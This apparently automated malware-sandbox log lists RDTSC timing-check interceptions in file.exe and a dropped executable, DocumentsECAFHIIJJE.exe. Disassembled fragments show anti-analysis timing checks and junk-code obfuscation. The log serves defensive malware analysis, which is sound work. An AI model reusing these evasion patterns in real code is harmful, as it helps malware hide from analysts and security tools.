Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0324 second address: 4EC0343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F28C4758085h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0377 second address: 4EC037B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC037B second address: 4EC0381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0435 second address: 4EC0448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F28C47EE2BFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0448 second address: 4EC0457 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0457 second address: 4EC045D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC045D second address: 4EC04C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F28C475807Eh 0x00000011 and eax, 1AE49F98h 0x00000017 jmp 00007F28C475807Bh 0x0000001c popfd 0x0000001d movzx eax, di 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 jmp 00007F28C475807Bh 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F28C4758080h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC04C2 second address: 4EC04D1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC050F second address: 4EC0515 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0616 second address: 4EC0616 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc edx 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d mov ah, EEh 0x0000000f popad 0x00000010 test al, al 0x00000012 jmp 00007F28C47EE2BBh 0x00000017 jne 00007F28C47EE276h 0x0000001d mov al, byte ptr [edx] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F28C47EE2BDh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC064A second address: 4EC064E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC064E second address: 4EC06B4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F28C47EE2C0h 0x00000008 and ah, 00000018h 0x0000000b jmp 00007F28C47EE2BBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushfd 0x00000014 jmp 00007F28C47EE2C8h 0x00000019 sub cx, 6678h 0x0000001e jmp 00007F28C47EE2BBh 0x00000023 popfd 0x00000024 popad 0x00000025 sub edx, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F28C47EE2C1h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC06B4 second address: 4EC06BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC06BA second address: 4EC071B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, dword ptr [ebp+08h] 0x0000000e jmp 00007F28C47EE2C2h 0x00000013 dec edi 0x00000014 pushad 0x00000015 mov ax, 434Dh 0x00000019 pushfd 0x0000001a jmp 00007F28C47EE2BAh 0x0000001f add al, 00000068h 0x00000022 jmp 00007F28C47EE2BBh 0x00000027 popfd 0x00000028 popad 0x00000029 lea ebx, dword ptr [edi+01h] 0x0000002c jmp 00007F28C47EE2C6h 0x00000031 mov al, byte ptr [edi+01h] 0x00000034 pushad 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC071B second address: 4EC0748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 call 00007F28C4758089h 0x0000000a push esi 0x0000000b pop edi 0x0000000c pop esi 0x0000000d popad 0x0000000e inc edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movzx eax, dx 0x00000015 mov ax, di 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0748 second address: 4EC07B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test al, al 0x0000000b jmp 00007F28C47EE2C0h 0x00000010 jne 00007F29352465CDh 0x00000016 jmp 00007F28C47EE2C0h 0x0000001b mov ecx, edx 0x0000001d pushad 0x0000001e mov bl, C0h 0x00000020 popad 0x00000021 shr ecx, 02h 0x00000024 jmp 00007F28C47EE2C4h 0x00000029 rep movsd 0x0000002b rep movsd 0x0000002d rep movsd 0x0000002f rep movsd 0x00000031 rep movsd 0x00000033 jmp 00007F28C47EE2C0h 0x00000038 mov ecx, edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d mov cx, 98AFh 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC07B7 second address: 4EC0825 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758085h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 03h 0x0000000c pushad 0x0000000d push eax 0x0000000e mov esi, edi 0x00000010 pop edx 0x00000011 movzx eax, di 0x00000014 popad 0x00000015 rep movsb 0x00000017 jmp 00007F28C4758087h 0x0000001c mov dword ptr [ebp-04h], FFFFFFFEh 0x00000023 jmp 00007F28C4758086h 0x00000028 mov eax, ebx 0x0000002a pushad 0x0000002b call 00007F28C475807Eh 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0825 second address: 4EC084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov dx, E874h 0x00000009 popad 0x0000000a mov ecx, dword ptr [ebp-10h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F28C47EE2C6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC084A second address: 4EC0850 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0850 second address: 4EC08AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr fs:[00000000h], ecx 0x00000012 pushad 0x00000013 mov si, BDB3h 0x00000017 pushfd 0x00000018 jmp 00007F28C47EE2C8h 0x0000001d sub cx, 67B8h 0x00000022 jmp 00007F28C47EE2BBh 0x00000027 popfd 0x00000028 popad 0x00000029 pop ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F28C47EE2C0h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC08AF second address: 4EC08B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC08B5 second address: 4EC0904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a jmp 00007F28C47EE2C0h 0x0000000f pop esi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F28C47EE2BDh 0x00000017 sbb ah, 00000066h 0x0000001a jmp 00007F28C47EE2C1h 0x0000001f popfd 0x00000020 popad 0x00000021 pop ebx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0904 second address: 4EC0908 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0908 second address: 4EC050F instructions: 0x00000000 rdtsc 0x00000002 mov dh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dl, 76h 0x00000008 popad 0x00000009 leave 0x0000000a pushad 0x0000000b mov esi, 2BF823D9h 0x00000010 mov ebx, ecx 0x00000012 popad 0x00000013 retn 0008h 0x00000016 cmp dword ptr [ebp-2Ch], 10h 0x0000001a mov eax, dword ptr [ebp-40h] 0x0000001d jnc 00007F28C47EE2B5h 0x0000001f push eax 0x00000020 lea edx, dword ptr [ebp-00000590h] 0x00000026 push edx 0x00000027 call esi 0x00000029 push 00000008h 0x0000002b jmp 00007F28C47EE2BEh 0x00000030 push 3571E133h 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0A4A second address: 4EC0B05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C4758089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F28C475807Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 pushad 0x00000012 mov ecx, edi 0x00000014 pushfd 0x00000015 jmp 00007F28C4758083h 0x0000001a sbb ah, 0000005Eh 0x0000001d jmp 00007F28C4758089h 0x00000022 popfd 0x00000023 popad 0x00000024 pushfd 0x00000025 jmp 00007F28C4758080h 0x0000002a and ax, 8358h 0x0000002f jmp 00007F28C475807Bh 0x00000034 popfd 0x00000035 popad 0x00000036 xchg eax, ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007F28C475807Bh 0x00000040 xor ax, B21Eh 0x00000045 jmp 00007F28C4758089h 0x0000004a popfd 0x0000004b mov eax, 35940FE7h 0x00000050 popad 0x00000051 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0B05 second address: 4EC0B32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F28C47EE2C3h 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F28C47EE2BCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0B32 second address: 4EC0B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0B36 second address: 4EC0B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0B3C second address: 4EC0B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, C7h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0B43 second address: 4EC0B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 4EC0B51 second address: 4EC0B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9105D7 second address: 9105FB instructions: 0x00000000 rdtsc 0x00000002 js 00007F28C47EE2B6h 0x00000008 jmp 00007F28C47EE2C7h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90F685 second address: 90F698 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90F698 second address: 90F69C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90FBF0 second address: 90FBF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90FD43 second address: 90FD5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C4h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90FD5D second address: 90FD63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90FD63 second address: 90FD8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push edx 0x0000000e jng 00007F28C47EE2BEh 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 90FD8D second address: 90FD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9118B0 second address: 9118BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9118BE second address: 9118C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9118C2 second address: 9118FE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F28C47EE2C3h 0x0000000b popad 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D3C60h] 0x00000013 push 00000000h 0x00000015 sub dword ptr [ebp+122D26FDh], eax 0x0000001b call 00007F28C47EE2B9h 0x00000020 push eax 0x00000021 push edx 0x00000022 je 00007F28C47EE2B8h 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9118FE second address: 911911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F28C4758076h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911A7C second address: 911B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d je 00007F28C47EE2BCh 0x00000013 mov dword ptr [ebp+122D1D9Dh], esi 0x00000019 mov edx, 7240FA53h 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007F28C47EE2B8h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 00000014h 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a jmp 00007F28C47EE2C3h 0x0000003f and edx, 34A2DF00h 0x00000045 call 00007F28C47EE2B9h 0x0000004a push edi 0x0000004b pushad 0x0000004c pushad 0x0000004d popad 0x0000004e push ebx 0x0000004f pop ebx 0x00000050 popad 0x00000051 pop edi 0x00000052 push eax 0x00000053 jmp 00007F28C47EE2C3h 0x00000058 mov eax, dword ptr [esp+04h] 0x0000005c push edi 0x0000005d jg 00007F28C47EE2C0h 0x00000063 pop edi 0x00000064 mov eax, dword ptr [eax] 0x00000066 push ecx 0x00000067 push eax 0x00000068 push edx 0x00000069 jne 00007F28C47EE2B6h 0x0000006f rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911B17 second address: 911B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C475807Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911B32 second address: 911BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, bx 0x0000000a push 00000003h 0x0000000c sub dword ptr [ebp+122D3468h], esi 0x00000012 push 00000000h 0x00000014 mov esi, dword ptr [ebp+122D3D3Ch] 0x0000001a push 00000003h 0x0000001c pushad 0x0000001d mov edx, dword ptr [ebp+122D3C2Ch] 0x00000023 popad 0x00000024 mov edi, esi 0x00000026 push AA8D4DAFh 0x0000002b jmp 00007F28C47EE2BAh 0x00000030 add dword ptr [esp], 1572B251h 0x00000037 push 00000000h 0x00000039 push ebp 0x0000003a call 00007F28C47EE2B8h 0x0000003f pop ebp 0x00000040 mov dword ptr [esp+04h], ebp 0x00000044 add dword ptr [esp+04h], 00000014h 0x0000004c inc ebp 0x0000004d push ebp 0x0000004e ret 0x0000004f pop ebp 0x00000050 ret 0x00000051 lea ebx, dword ptr [ebp+12456771h] 0x00000057 adc dh, FFFFFFB9h 0x0000005a xchg eax, ebx 0x0000005b push eax 0x0000005c push edx 0x0000005d ja 00007F28C47EE2CFh 0x00000063 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911C69 second address: 911C6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911C6F second address: 911C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911C73 second address: 911CFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov edi, dword ptr [ebp+122D3CD8h] 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F28C4758078h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b push E2DBF26Bh 0x00000030 jg 00007F28C4758091h 0x00000036 add dword ptr [esp], 1D240E15h 0x0000003d clc 0x0000003e push 00000003h 0x00000040 mov ecx, dword ptr [ebp+122D25F4h] 0x00000046 push 00000000h 0x00000048 or ecx, 644ABFBCh 0x0000004e push 00000003h 0x00000050 xor ecx, dword ptr [ebp+122D3C38h] 0x00000056 push DDAFB23Fh 0x0000005b jbe 00007F28C4758090h 0x00000061 push eax 0x00000062 push edx 0x00000063 push eax 0x00000064 push edx 0x00000065 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 911CFD second address: 911D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 92419A second address: 92419F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 931E62 second address: 931E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F28C47EE2C6h 0x0000000a jc 00007F28C47EE2CDh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 931E85 second address: 931E9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C4758081h 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932012 second address: 93202F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F28C47EE2C3h 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932168 second address: 93216C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93216C second address: 932172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932172 second address: 932178 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932178 second address: 932198 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F28C47EE2C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9324A1 second address: 9324A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9324A5 second address: 9324A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932645 second address: 93264A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932800 second address: 932804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932C66 second address: 932C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 932F2F second address: 932F33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 8F45BE second address: 8F45D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F28C4758076h 0x0000000b jl 00007F28C4758076h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 8F45D2 second address: 8F45DC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F28C47EE2BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 8F45DC second address: 8F45E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93308D second address: 93309B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 93309B second address: 9330A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9330A1 second address: 9330AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jc 00007F28C47EE2BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9330AE second address: 9330B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsECAFHIIJJE.exe RDTSC instruction interceptor: First address: 9337B7 second address: 9337BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
